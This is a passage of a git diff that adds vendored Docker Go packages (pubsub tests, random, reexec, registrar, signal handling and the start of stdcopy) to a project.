NewPublisher(100*time.Millisecond, 10) + subs := []chan interface{}{} + subs = append(subs, p.Subscribe(), p.Subscribe(), p.Subscribe()) + p.Close() + + for _, c := range subs { + if _, ok := <-c; ok { + t.Fatal("expected all subscriber channels to be closed") + } + } +} + +const sampleText = "test" + +type testSubscriber struct { + dataCh chan interface{} + ch chan error +} + +func (s *testSubscriber) Wait() error { + return <-s.ch +} + +func newTestSubscriber(p *Publisher) *testSubscriber { + ts := &testSubscriber{ + dataCh: p.Subscribe(), + ch: make(chan error), + } + go func() { + for data := range ts.dataCh { + s, ok := data.(string) + if !ok { + ts.ch <- fmt.Errorf("Unexpected type %T", data) + break + } + if s != sampleText { + ts.ch <- fmt.Errorf("Unexpected text %s", s) + break + } + } + close(ts.ch) + }() + return ts +} + +// for testing with -race +func TestPubSubRace(t *testing.T) { + p := NewPublisher(0, 1024) + var subs [](*testSubscriber) + for j := 0; j < 50; j++ { + subs = append(subs, newTestSubscriber(p)) + } + for j := 0; j < 1000; j++ { + p.Publish(sampleText) + } + time.AfterFunc(1*time.Second, func() { + for _, s := range subs { + p.Evict(s.dataCh) + } + }) + for _, s := range subs { + s.Wait() + } +} + +func BenchmarkPubSub(b *testing.B) { + for i := 0; i < b.N; i++ { + b.StopTimer() + p := NewPublisher(0, 1024) + var subs [](*testSubscriber) + for j := 0; j < 50; j++ { + subs = append(subs, newTestSubscriber(p)) + } + b.StartTimer() + for j := 0; j < 1000; j++ { + p.Publish(sampleText) + } + time.AfterFunc(1*time.Second, func() { + for _, s := range subs { + p.Evict(s.dataCh) + } + }) + for _, s := range subs { + if err := s.Wait(); err != nil { + b.Fatal(err) + } + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/random/random.go b/vendor/github.com/docker/docker/pkg/random/random.go new file mode 100644 index 0000000000..70de4d1304 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/random/random.go @@ -0,0 +1,71 @@ +package random + +import ( + cryptorand "crypto/rand" + "io" + "math" + "math/big" + "math/rand" + "sync" + "time" +) + +// Rand is a global *rand.Rand instance, which initialized with NewSource() source. +var Rand = rand.New(NewSource()) + +// Reader is a global, shared instance of a pseudorandom bytes generator. +// It doesn't consume entropy. +var Reader io.Reader = &reader{rnd: Rand} + +// copypaste from standard math/rand +type lockedSource struct { + lk sync.Mutex + src rand.Source +} + +func (r *lockedSource) Int63() (n int64) { + r.lk.Lock() + n = r.src.Int63() + r.lk.Unlock() + return +} + +func (r *lockedSource) Seed(seed int64) { + r.lk.Lock() + r.src.Seed(seed) + r.lk.Unlock() +} + +// NewSource returns math/rand.Source safe for concurrent use and initialized +// with current unix-nano timestamp +func NewSource() rand.Source { + var seed int64 + if cryptoseed, err := cryptorand.Int(cryptorand.Reader, big.NewInt(math.MaxInt64)); err != nil { + // This should not happen, but worst-case fallback to time-based seed. + seed = time.Now().UnixNano() + } else { + seed = cryptoseed.Int64() + } + return &lockedSource{ + src: rand.NewSource(seed), + } +} + +type reader struct { + rnd *rand.Rand +} + +func (r *reader) Read(b []byte) (int, error) { + i := 0 + for { + val := r.rnd.Int63() + for val > 0 { + b[i] = byte(val) + i++ + if i == len(b) { + return i, nil + } + val >>= 8 + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/random/random_test.go b/vendor/github.com/docker/docker/pkg/random/random_test.go new file mode 100644 index 0000000000..cf405f78cb --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/random/random_test.go @@ -0,0 +1,22 @@ +package random + +import ( + "math/rand" + "sync" + "testing" +) + +// for go test -v -race +func TestConcurrency(t *testing.T) { + rnd := rand.New(NewSource()) + var wg sync.WaitGroup + + for i := 0; i < 10; i++ { + wg.Add(1) + go func() { + rnd.Int63() + wg.Done() + }() + } + wg.Wait() +} diff --git a/vendor/github.com/docker/docker/pkg/reexec/README.md b/vendor/github.com/docker/docker/pkg/reexec/README.md new file mode 100644 index 0000000000..45592ce85a --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/reexec/README.md @@ -0,0 +1,5 @@ +## reexec + +The `reexec` package facilitates the busybox style reexec of the docker binary that we require because +of the forking limitations of using Go. Handlers can be registered with a name and the argv 0 of +the exec of the binary will be used to find and execute custom init paths. diff --git a/vendor/github.com/docker/docker/pkg/reexec/command_linux.go b/vendor/github.com/docker/docker/pkg/reexec/command_linux.go new file mode 100644 index 0000000000..34ae2a9dcd --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/reexec/command_linux.go @@ -0,0 +1,28 @@ +// +build linux + +package reexec + +import ( + "os/exec" + "syscall" +) + +// Self returns the path to the current process's binary. +// Returns "/proc/self/exe". +func Self() string { + return "/proc/self/exe" +} + +// Command returns *exec.Cmd which has Path as current binary. Also it setting +// SysProcAttr.Pdeathsig to SIGTERM. +// This will use the in-memory version (/proc/self/exe) of the current binary, +// it is thus safe to delete or replace the on-disk binary (os.Args[0]). +func Command(args ...string) *exec.Cmd { + return &exec.Cmd{ + Path: Self(), + Args: args, + SysProcAttr: &syscall.SysProcAttr{ + Pdeathsig: syscall.SIGTERM, + }, + } +} diff --git a/vendor/github.com/docker/docker/pkg/reexec/command_unix.go b/vendor/github.com/docker/docker/pkg/reexec/command_unix.go new file mode 100644 index 0000000000..778a720e3b --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/reexec/command_unix.go @@ -0,0 +1,23 @@ +// +build freebsd solaris darwin + +package reexec + +import ( + "os/exec" +) + +// Self returns the path to the current process's binary. +// Uses os.Args[0]. +func Self() string { + return naiveSelf() +} + +// Command returns *exec.Cmd which has Path as current binary. +// For example if current binary is "docker" at "/usr/bin/", then cmd.Path will +// be set to "/usr/bin/docker". +func Command(args ...string) *exec.Cmd { + return &exec.Cmd{ + Path: Self(), + Args: args, + } +} diff --git a/vendor/github.com/docker/docker/pkg/reexec/command_unsupported.go b/vendor/github.com/docker/docker/pkg/reexec/command_unsupported.go new file mode 100644 index 0000000000..76edd82427 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/reexec/command_unsupported.go @@ -0,0 +1,12 @@ +// +build !linux,!windows,!freebsd,!solaris,!darwin + +package reexec + +import ( + "os/exec" +) + +// Command is unsupported on operating systems apart from Linux, Windows, Solaris and Darwin. +func Command(args ...string) *exec.Cmd { + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/reexec/command_windows.go b/vendor/github.com/docker/docker/pkg/reexec/command_windows.go new file mode 100644 index 0000000000..ca871c4227 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/reexec/command_windows.go @@ -0,0 +1,23 @@ +// +build windows + +package reexec + +import ( + "os/exec" +) + +// Self returns the path to the current process's binary. +// Uses os.Args[0]. +func Self() string { + return naiveSelf() +} + +// Command returns *exec.Cmd which has Path as current binary. +// For example if current binary is "docker.exe" at "C:\", then cmd.Path will +// be set to "C:\docker.exe". +func Command(args ...string) *exec.Cmd { + return &exec.Cmd{ + Path: Self(), + Args: args, + } +} diff --git a/vendor/github.com/docker/docker/pkg/reexec/reexec.go b/vendor/github.com/docker/docker/pkg/reexec/reexec.go new file mode 100644 index 0000000000..c56671d919 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/reexec/reexec.go @@ -0,0 +1,47 @@ +package reexec + +import ( + "fmt" + "os" + "os/exec" + "path/filepath" +) + +var registeredInitializers = make(map[string]func()) + +// Register adds an initialization func under the specified name +func Register(name string, initializer func()) { + if _, exists := registeredInitializers[name]; exists { + panic(fmt.Sprintf("reexec func already registered under name %q", name)) + } + + registeredInitializers[name] = initializer +} + +// Init is called as the first part of the exec process and returns true if an +// initialization function was called. +func Init() bool { + initializer, exists := registeredInitializers[os.Args[0]] + if exists { + initializer() + + return true + } + return false +} + +func naiveSelf() string { + name := os.Args[0] + if filepath.Base(name) == name { + if lp, err := exec.LookPath(name); err == nil { + return lp + } + } + // handle conversion of relative paths to absolute + if absName, err := filepath.Abs(name); err == nil { + return absName + } + // if we couldn't get absolute name, return original + // (NOTE: Go only errors on Abs() if os.Getwd fails) + return name +} diff --git a/vendor/github.com/docker/docker/pkg/registrar/registrar.go b/vendor/github.com/docker/docker/pkg/registrar/registrar.go new file mode 100644 index 0000000000..1e75ee995b --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/registrar/registrar.go @@ -0,0 +1,127 @@ +// Package registrar provides name registration. It reserves a name to a given key. +package registrar + +import ( + "errors" + "sync" +) + +var ( + // ErrNameReserved is an error which is returned when a name is requested to be reserved that already is reserved + ErrNameReserved = errors.New("name is reserved") + // ErrNameNotReserved is an error which is returned when trying to find a name that is not reserved + ErrNameNotReserved = errors.New("name is not reserved") + // ErrNoSuchKey is returned when trying to find the names for a key which is not known + ErrNoSuchKey = errors.New("provided key does not exist") +) + +// Registrar stores indexes a list of keys and their registered names as well as indexes names and the key that they are registered to +// Names must be unique. +// Registrar is safe for concurrent access. +type Registrar struct { + idx map[string][]string + names map[string]string + mu sync.Mutex +} + +// NewRegistrar creates a new Registrar with the an empty index +func NewRegistrar() *Registrar { + return &Registrar{ + idx: make(map[string][]string), + names: make(map[string]string), + } +} + +// Reserve registers a key to a name +// Reserve is idempotent +// Attempting to reserve a key to a name that already exists results in an `ErrNameReserved` +// A name reservation is globally unique +func (r *Registrar) Reserve(name, key string) error { + r.mu.Lock() + defer r.mu.Unlock() + + if k, exists := r.names[name]; exists { + if k != key { + return ErrNameReserved + } + return nil + } + + r.idx[key] = append(r.idx[key], name) + r.names[name] = key + return nil +} + +// Release releases the reserved name +// Once released, a name can be reserved again +func (r *Registrar) Release(name string) { + r.mu.Lock() + defer r.mu.Unlock() + + key, exists := r.names[name] + if !exists { + return + } + + for i, n := range r.idx[key] { + if n != name { + continue + } + r.idx[key] = append(r.idx[key][:i], r.idx[key][i+1:]...) + break + } + + delete(r.names, name) + + if len(r.idx[key]) == 0 { + delete(r.idx, key) + } +} + +// Delete removes all reservations for the passed in key. +// All names reserved to this key are released. +func (r *Registrar) Delete(key string) { + r.mu.Lock() + for _, name := range r.idx[key] { + delete(r.names, name) + } + delete(r.idx, key) + r.mu.Unlock() +} + +// GetNames lists all the reserved names for the given key +func (r *Registrar) GetNames(key string) ([]string, error) { + r.mu.Lock() + defer r.mu.Unlock() + + names, exists := r.idx[key] + if !exists { + return nil, ErrNoSuchKey + } + return names, nil +} + +// Get returns the key that the passed in name is reserved to +func (r *Registrar) Get(name string) (string, error) { + r.mu.Lock() + key, exists := r.names[name] + r.mu.Unlock() + + if !exists { + return "", ErrNameNotReserved + } + return key, nil +} + +// GetAll returns all registered names +func (r *Registrar) GetAll() map[string][]string { + out := make(map[string][]string) + + r.mu.Lock() + // copy index into out + for id, names := range r.idx { + out[id] = names + } + r.mu.Unlock() + return out +} diff --git a/vendor/github.com/docker/docker/pkg/registrar/registrar_test.go b/vendor/github.com/docker/docker/pkg/registrar/registrar_test.go new file mode 100644 index 0000000000..0c1ef312ae --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/registrar/registrar_test.go @@ -0,0 +1,119 @@ +package registrar + +import ( + "reflect" + "testing" +) + +func TestReserve(t *testing.T) { + r := NewRegistrar() + + obj := "test1" + if err := r.Reserve("test", obj); err != nil { + t.Fatal(err) + } + + if err := r.Reserve("test", obj); err != nil { + t.Fatal(err) + } + + obj2 := "test2" + err := r.Reserve("test", obj2) + if err == nil { + t.Fatalf("expected error when reserving an already reserved name to another object") + } + if err != ErrNameReserved { + t.Fatal("expected `ErrNameReserved` error when attempting to reserve an already reserved name") + } +} + +func TestRelease(t *testing.T) { + r := NewRegistrar() + obj := "testing" + + if err := r.Reserve("test", obj); err != nil { + t.Fatal(err) + } + r.Release("test") + r.Release("test") // Ensure there is no panic here + + if err := r.Reserve("test", obj); err != nil { + t.Fatal(err) + } +} + +func TestGetNames(t *testing.T) { + r := NewRegistrar() + obj := "testing" + names := []string{"test1", "test2"} + + for _, name := range names { + if err := r.Reserve(name, obj); err != nil { + t.Fatal(err) + } + } + r.Reserve("test3", "other") + + names2, err := r.GetNames(obj) + if err != nil { + t.Fatal(err) + } + + if !reflect.DeepEqual(names, names2) { + t.Fatalf("Exepected: %v, Got: %v", names, names2) + } +} + +func TestDelete(t *testing.T) { + r := NewRegistrar() + obj := "testing" + names := []string{"test1", "test2"} + for _, name := range names { + if err := r.Reserve(name, obj); err != nil { + t.Fatal(err) + } + } + + r.Reserve("test3", "other") + r.Delete(obj) + + _, err := r.GetNames(obj) + if err == nil { + t.Fatal("expected error getting names for deleted key") + } + + if err != ErrNoSuchKey { + t.Fatal("expected `ErrNoSuchKey`") + } +} + +func TestGet(t *testing.T) { + r := NewRegistrar() + obj := "testing" + name := "test" + + _, err := r.Get(name) + if err == nil { + t.Fatal("expected error when key does not exist") + } + if err != ErrNameNotReserved { + t.Fatal(err) + } + + if err := r.Reserve(name, obj); err != nil { + t.Fatal(err) + } + + if _, err = r.Get(name); err != nil { + t.Fatal(err) + } + + r.Delete(obj) + _, err = r.Get(name) + if err == nil { + t.Fatal("expected error when key does not exist") + } + if err != ErrNameNotReserved { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/pkg/signal/README.md b/vendor/github.com/docker/docker/pkg/signal/README.md new file mode 100644 index 0000000000..2b237a5942 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/signal/README.md @@ -0,0 +1 @@ +This package provides helper functions for dealing with signals across various operating systems \ No newline at end of file diff --git a/vendor/github.com/docker/docker/pkg/signal/signal.go b/vendor/github.com/docker/docker/pkg/signal/signal.go new file mode 100644 index 0000000000..68bb77cf58 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/signal/signal.go @@ -0,0 +1,54 @@ +// Package signal provides helper functions for dealing with signals across +// various operating systems. +package signal + +import ( + "fmt" + "os" + "os/signal" + "strconv" + "strings" + "syscall" +) + +// CatchAll catches all signals and relays them to the specified channel. +func CatchAll(sigc chan os.Signal) { + handledSigs := []os.Signal{} + for _, s := range SignalMap { + handledSigs = append(handledSigs, s) + } + signal.Notify(sigc, handledSigs...) +} + +// StopCatch stops catching the signals and closes the specified channel. +func StopCatch(sigc chan os.Signal) { + signal.Stop(sigc) + close(sigc) +} + +// ParseSignal translates a string to a valid syscall signal. +// It returns an error if the signal map doesn't include the given signal. +func ParseSignal(rawSignal string) (syscall.Signal, error) { + s, err := strconv.Atoi(rawSignal) + if err == nil { + if s == 0 { + return -1, fmt.Errorf("Invalid signal: %s", rawSignal) + } + return syscall.Signal(s), nil + } + signal, ok := SignalMap[strings.TrimPrefix(strings.ToUpper(rawSignal), "SIG")] + if !ok { + return -1, fmt.Errorf("Invalid signal: %s", rawSignal) + } + return signal, nil +} + +// ValidSignalForPlatform returns true if a signal is valid on the platform +func ValidSignalForPlatform(sig syscall.Signal) bool { + for _, v := range SignalMap { + if v == sig { + return true + } + } + return false +} diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_darwin.go b/vendor/github.com/docker/docker/pkg/signal/signal_darwin.go new file mode 100644 index 0000000000..946de87e94 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/signal/signal_darwin.go @@ -0,0 +1,41 @@ +package signal + +import ( + "syscall" +) + +// SignalMap is a map of Darwin signals. +var SignalMap = map[string]syscall.Signal{ + "ABRT": syscall.SIGABRT, + "ALRM": syscall.SIGALRM, + "BUG": syscall.SIGBUS, + "CHLD": syscall.SIGCHLD, + "CONT": syscall.SIGCONT, + "EMT": syscall.SIGEMT, + "FPE": syscall.SIGFPE, + "HUP": syscall.SIGHUP, + "ILL": syscall.SIGILL, + "INFO": syscall.SIGINFO, + "INT": syscall.SIGINT, + "IO": syscall.SIGIO, + "IOT": syscall.SIGIOT, + "KILL": syscall.SIGKILL, + "PIPE": syscall.SIGPIPE, + "PROF": syscall.SIGPROF, + "QUIT": syscall.SIGQUIT, + "SEGV": syscall.SIGSEGV, + "STOP": syscall.SIGSTOP, + "SYS": syscall.SIGSYS, + "TERM": syscall.SIGTERM, + "TRAP": syscall.SIGTRAP, + "TSTP": syscall.SIGTSTP, + "TTIN": syscall.SIGTTIN, + "TTOU": syscall.SIGTTOU, + "URG": syscall.SIGURG, + "USR1": syscall.SIGUSR1, + "USR2": syscall.SIGUSR2, + "VTALRM": syscall.SIGVTALRM, + "WINCH": syscall.SIGWINCH, + "XCPU": syscall.SIGXCPU, + "XFSZ": syscall.SIGXFSZ, +} diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_freebsd.go b/vendor/github.com/docker/docker/pkg/signal/signal_freebsd.go new file mode 100644 index 0000000000..6b9569bb75 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/signal/signal_freebsd.go @@ -0,0 +1,43 @@ +package signal + +import ( + "syscall" +) + +// SignalMap is a map of FreeBSD signals. +var SignalMap = map[string]syscall.Signal{ + "ABRT": syscall.SIGABRT, + "ALRM": syscall.SIGALRM, + "BUF": syscall.SIGBUS, + "CHLD": syscall.SIGCHLD, + "CONT": syscall.SIGCONT, + "EMT": syscall.SIGEMT, + "FPE": syscall.SIGFPE, + "HUP": syscall.SIGHUP, + "ILL": syscall.SIGILL, + "INFO": syscall.SIGINFO, + "INT": syscall.SIGINT, + "IO": syscall.SIGIO, + "IOT": syscall.SIGIOT, + "KILL": syscall.SIGKILL, + "LWP": syscall.SIGLWP, + "PIPE": syscall.SIGPIPE, + "PROF": syscall.SIGPROF, + "QUIT": syscall.SIGQUIT, + "SEGV": syscall.SIGSEGV, + "STOP": syscall.SIGSTOP, + "SYS": syscall.SIGSYS, + "TERM": syscall.SIGTERM, + "THR": syscall.SIGTHR, + "TRAP": syscall.SIGTRAP, + "TSTP": syscall.SIGTSTP, + "TTIN": syscall.SIGTTIN, + "TTOU": syscall.SIGTTOU, + "URG": syscall.SIGURG, + "USR1": syscall.SIGUSR1, + "USR2": syscall.SIGUSR2, + "VTALRM": syscall.SIGVTALRM, + "WINCH": syscall.SIGWINCH, + "XCPU": syscall.SIGXCPU, + "XFSZ": syscall.SIGXFSZ, +} diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_linux.go b/vendor/github.com/docker/docker/pkg/signal/signal_linux.go new file mode 100644 index 0000000000..d418cbe9e3 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/signal/signal_linux.go @@ -0,0 +1,80 @@ +package signal + +import ( + "syscall" +) + +const ( + sigrtmin = 34 + sigrtmax = 64 +) + +// SignalMap is a map of Linux signals. +var SignalMap = map[string]syscall.Signal{ + "ABRT": syscall.SIGABRT, + "ALRM": syscall.SIGALRM, + "BUS": syscall.SIGBUS, + "CHLD": syscall.SIGCHLD, + "CLD": syscall.SIGCLD, + "CONT": syscall.SIGCONT, + "FPE": syscall.SIGFPE, + "HUP": syscall.SIGHUP, + "ILL": syscall.SIGILL, + "INT": syscall.SIGINT, + "IO": syscall.SIGIO, + "IOT": syscall.SIGIOT, + "KILL": syscall.SIGKILL, + "PIPE": syscall.SIGPIPE, + "POLL": syscall.SIGPOLL, + "PROF": syscall.SIGPROF, + "PWR": syscall.SIGPWR, + "QUIT": syscall.SIGQUIT, + "SEGV": syscall.SIGSEGV, + "STKFLT": syscall.SIGSTKFLT, + "STOP": syscall.SIGSTOP, + "SYS": syscall.SIGSYS, + "TERM": syscall.SIGTERM, + "TRAP": syscall.SIGTRAP, + "TSTP": syscall.SIGTSTP, + "TTIN": syscall.SIGTTIN, + "TTOU": syscall.SIGTTOU, + "UNUSED": syscall.SIGUNUSED, + "URG": syscall.SIGURG, + "USR1": syscall.SIGUSR1, + "USR2": syscall.SIGUSR2, + "VTALRM": syscall.SIGVTALRM, + "WINCH": syscall.SIGWINCH, + "XCPU": syscall.SIGXCPU, + "XFSZ": syscall.SIGXFSZ, + "RTMIN": sigrtmin, + "RTMIN+1": sigrtmin + 1, + "RTMIN+2": sigrtmin + 2, + "RTMIN+3": sigrtmin + 3, + "RTMIN+4": sigrtmin + 4, + "RTMIN+5": sigrtmin + 5, + "RTMIN+6": sigrtmin + 6, + "RTMIN+7": sigrtmin + 7, + "RTMIN+8": sigrtmin + 8, + "RTMIN+9": sigrtmin + 9, + "RTMIN+10": sigrtmin + 10, + "RTMIN+11": sigrtmin + 11, + "RTMIN+12": sigrtmin + 12, + "RTMIN+13": sigrtmin + 13, + "RTMIN+14": sigrtmin + 14, + "RTMIN+15": sigrtmin + 15, + "RTMAX-14": sigrtmax - 14, + "RTMAX-13": sigrtmax - 13, + "RTMAX-12": sigrtmax - 12, + "RTMAX-11": sigrtmax - 11, + "RTMAX-10": sigrtmax - 10, + "RTMAX-9": sigrtmax - 9, + "RTMAX-8": sigrtmax - 8, + "RTMAX-7": sigrtmax - 7, + "RTMAX-6": sigrtmax - 6, + "RTMAX-5": sigrtmax - 5, + "RTMAX-4": sigrtmax - 4, + "RTMAX-3": sigrtmax - 3, + "RTMAX-2": sigrtmax - 2, + "RTMAX-1": sigrtmax - 1, + "RTMAX": sigrtmax, +} diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_solaris.go b/vendor/github.com/docker/docker/pkg/signal/signal_solaris.go new file mode 100644 index 0000000000..89576b9e3b --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/signal/signal_solaris.go @@ -0,0 +1,42 @@ +package signal + +import ( + "syscall" +) + +// SignalMap is a map of Solaris signals. +// SIGINFO and SIGTHR not defined for Solaris +var SignalMap = map[string]syscall.Signal{ + "ABRT": syscall.SIGABRT, + "ALRM": syscall.SIGALRM, + "BUF": syscall.SIGBUS, + "CHLD": syscall.SIGCHLD, + "CONT": syscall.SIGCONT, + "EMT": syscall.SIGEMT, + "FPE": syscall.SIGFPE, + "HUP": syscall.SIGHUP, + "ILL": syscall.SIGILL, + "INT": syscall.SIGINT, + "IO": syscall.SIGIO, + "IOT": syscall.SIGIOT, + "KILL": syscall.SIGKILL, + "LWP": syscall.SIGLWP, + "PIPE": syscall.SIGPIPE, + "PROF": syscall.SIGPROF, + "QUIT": syscall.SIGQUIT, + "SEGV": syscall.SIGSEGV, + "STOP": syscall.SIGSTOP, + "SYS": syscall.SIGSYS, + "TERM": syscall.SIGTERM, + "TRAP": syscall.SIGTRAP, + "TSTP": syscall.SIGTSTP, + "TTIN": syscall.SIGTTIN, + "TTOU": syscall.SIGTTOU, + "URG": syscall.SIGURG, + "USR1": syscall.SIGUSR1, + "USR2": syscall.SIGUSR2, + "VTALRM": syscall.SIGVTALRM, + "WINCH": syscall.SIGWINCH, + "XCPU": syscall.SIGXCPU, + "XFSZ": syscall.SIGXFSZ, +} diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_unix.go b/vendor/github.com/docker/docker/pkg/signal/signal_unix.go new file mode 100644 index 0000000000..5d058fd56b --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/signal/signal_unix.go @@ -0,0 +1,21 @@ +// +build !windows + +package signal + +import ( + "syscall" +) + +// Signals used in cli/command (no windows equivalent, use +// invalid signals so they don't get handled) + +const ( + // SIGCHLD is a signal sent to a process when a child process terminates, is interrupted, or resumes after being interrupted. + SIGCHLD = syscall.SIGCHLD + // SIGWINCH is a signal sent to a process when its controlling terminal changes its size + SIGWINCH = syscall.SIGWINCH + // SIGPIPE is a signal sent to a process when a pipe is written to before the other end is open for reading + SIGPIPE = syscall.SIGPIPE + // DefaultStopSignal is the syscall signal used to stop a container in unix systems. + DefaultStopSignal = "SIGTERM" +) diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_unsupported.go b/vendor/github.com/docker/docker/pkg/signal/signal_unsupported.go new file mode 100644 index 0000000000..c592d37dfe --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/signal/signal_unsupported.go @@ -0,0 +1,10 @@ +// +build !linux,!darwin,!freebsd,!windows,!solaris + +package signal + +import ( + "syscall" +) + +// SignalMap is an empty map of signals for unsupported platform. +var SignalMap = map[string]syscall.Signal{} diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_windows.go b/vendor/github.com/docker/docker/pkg/signal/signal_windows.go new file mode 100644 index 0000000000..440f2700e2 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/signal/signal_windows.go @@ -0,0 +1,28 @@ +// +build windows + +package signal + +import ( + "syscall" +) + +// Signals used in cli/command (no windows equivalent, use +// invalid signals so they don't get handled) +const ( + SIGCHLD = syscall.Signal(0xff) + SIGWINCH = syscall.Signal(0xff) + SIGPIPE = syscall.Signal(0xff) + // DefaultStopSignal is the syscall signal used to stop a container in windows systems. + DefaultStopSignal = "15" +) + +// SignalMap is a map of "supported" signals. As per the comment in GOLang's +// ztypes_windows.go: "More invented values for signals". Windows doesn't +// really support signals in any way, shape or form that Unix does. +// +// We have these so that docker kill can be used to gracefully (TERM) and +// forcibly (KILL) terminate a container on Windows. +var SignalMap = map[string]syscall.Signal{ + "KILL": syscall.SIGKILL, + "TERM": syscall.SIGTERM, +} diff --git a/vendor/github.com/docker/docker/pkg/signal/trap.go b/vendor/github.com/docker/docker/pkg/signal/trap.go new file mode 100644 index 0000000000..638a1ab66c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/signal/trap.go @@ -0,0 +1,103 @@ +package signal + +import ( + "fmt" + "os" + gosignal "os/signal" + "path/filepath" + "runtime" + "strings" + "sync/atomic" + "syscall" + "time" + + "github.com/Sirupsen/logrus" + "github.com/pkg/errors" +) + +// Trap sets up a simplified signal "trap", appropriate for common +// behavior expected from a vanilla unix command-line tool in general +// (and the Docker engine in particular). +// +// * If SIGINT or SIGTERM are received, `cleanup` is called, then the process is terminated. +// * If SIGINT or SIGTERM are received 3 times before cleanup is complete, then cleanup is +// skipped and the process is terminated immediately (allows force quit of stuck daemon) +// * A SIGQUIT always causes an exit without cleanup, with a goroutine dump preceding exit. +// * Ignore SIGPIPE events. These are generated by systemd when journald is restarted while +// the docker daemon is not restarted and also running under systemd. +// Fixes https://github.com/docker/docker/issues/19728 +// +func Trap(cleanup func()) { + c := make(chan os.Signal, 1) + // we will handle INT, TERM, QUIT, SIGPIPE here + signals := []os.Signal{os.Interrupt, syscall.SIGTERM, syscall.SIGQUIT, syscall.SIGPIPE} + gosignal.Notify(c, signals...) + go func() { + interruptCount := uint32(0) + for sig := range c { + if sig == syscall.SIGPIPE { + continue + } + + go func(sig os.Signal) { + logrus.Infof("Processing signal '%v'", sig) + switch sig { + case os.Interrupt, syscall.SIGTERM: + if atomic.LoadUint32(&interruptCount) < 3 { + // Initiate the cleanup only once + if atomic.AddUint32(&interruptCount, 1) == 1 { + // Call the provided cleanup handler + cleanup() + os.Exit(0) + } else { + return + } + } else { + // 3 SIGTERM/INT signals received; force exit without cleanup + logrus.Info("Forcing docker daemon shutdown without cleanup; 3 interrupts received") + } + case syscall.SIGQUIT: + DumpStacks("") + logrus.Info("Forcing docker daemon shutdown without cleanup on SIGQUIT") + } + //for the SIGINT/TERM, and SIGQUIT non-clean shutdown case, exit with 128 + signal # + os.Exit(128 + int(sig.(syscall.Signal))) + }(sig) + } + }() +} + +const stacksLogNameTemplate = "goroutine-stacks-%s.log" + +// DumpStacks appends the runtime stack into file in dir and returns full path +// to that file. +func DumpStacks(dir string) (string, error) { + var ( + buf []byte + stackSize int + ) + bufferLen := 16384 + for stackSize == len(buf) { + buf = make([]byte, bufferLen) + stackSize = runtime.Stack(buf, true) + bufferLen *= 2 + } + buf = buf[:stackSize] + var f *os.File + if dir != "" { + path := filepath.Join(dir, fmt.Sprintf(stacksLogNameTemplate, strings.Replace(time.Now().Format(time.RFC3339), ":", "", -1))) + var err error + f, err = os.OpenFile(path, os.O_CREATE|os.O_WRONLY, 0666) + if err != nil { + return "", errors.Wrap(err, "failed to open file to write the goroutine stacks") + } + defer f.Close() + defer f.Sync() + } else { + f = os.Stderr + } + if _, err := f.Write(buf); err != nil { + return "", errors.Wrap(err, "failed to write goroutine stacks") + } + return f.Name(), nil +} diff --git a/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy.go b/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy.go new file mode 100644 index 0000000000..be20765457 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/stdcopy/stdcopy.go @@ -0,0 +1,174 @@ +package stdcopy + +import ( + "bytes" + "encoding/binary" + "errors" + "fmt" + "io" + "sync" +) + +// StdType is the type of standard stream +// a writer can multiplex to. +type StdType byte + +const ( + // Stdin represents standard input stream type. + Stdin StdType = iota + // Stdout represents standard output stream type. + Stdout + // Stderr represents standard error steam type. + Stderr + + stdWriterPrefixLen = 8 + stdWriterFdIndex = 0 + stdWriterSizeIndex = 4 + + startingBufLen = 32*1024 + stdWriterPrefixLen + 1 +) + +var bufPool = &sync.Pool{New: func() interface{} { return bytes.NewBuffer(nil) }} + +// stdWriter is wrapper of io.Writer with extra customized info. +type stdWriter struct { + io.Writer + prefix byte +} + +// Write sends the buffer to the underneath writer. +// It inserts the prefix header before the buffer, +// so stdcopy.StdCopy knows where to multiplex the output. +// It makes stdWriter to implement io.Writer. +func (w *stdWriter) Write(p []byte) (n int, err error) { + if w == nil || w.Writer == nil { + return 0, errors.New("Writer not instantiated") + } + if p == nil { + return 0, nil + } + + header := [stdWriterPrefixLen]byte{stdWriterFdIndex: w.prefix} + binary.BigEndian.PutUint32(header[stdWriterSizeIndex:], uint32(len(p))) + buf := bufPool.Get().(*bytes.Buffer) + buf.Write(header[:]) + buf.Write(p) + + n, err = w.Writer.Write(buf.Bytes()) + n -= stdWriterPrefixLen + if n < 0 { + n = 0 + } + + buf.Reset() + bufPool.Put(buf) + return +} + +// NewStdWriter instantiates a new Writer. +// Everything written to it will be encapsulated using a custom format, +// and written to the underlying `w` stream. +// This allows multiple write streams (e.g. stdout and stderr) to be muxed into a single connection. +// `t` indicates the id of the stream to encapsulate. +// It can be stdcopy.Stdin, stdcopy.Stdout, stdcopy.Stderr. +func NewStdWriter(w io.Writer, t StdType) io.Writer { + return &stdWriter{ + Writer: w, + prefix: 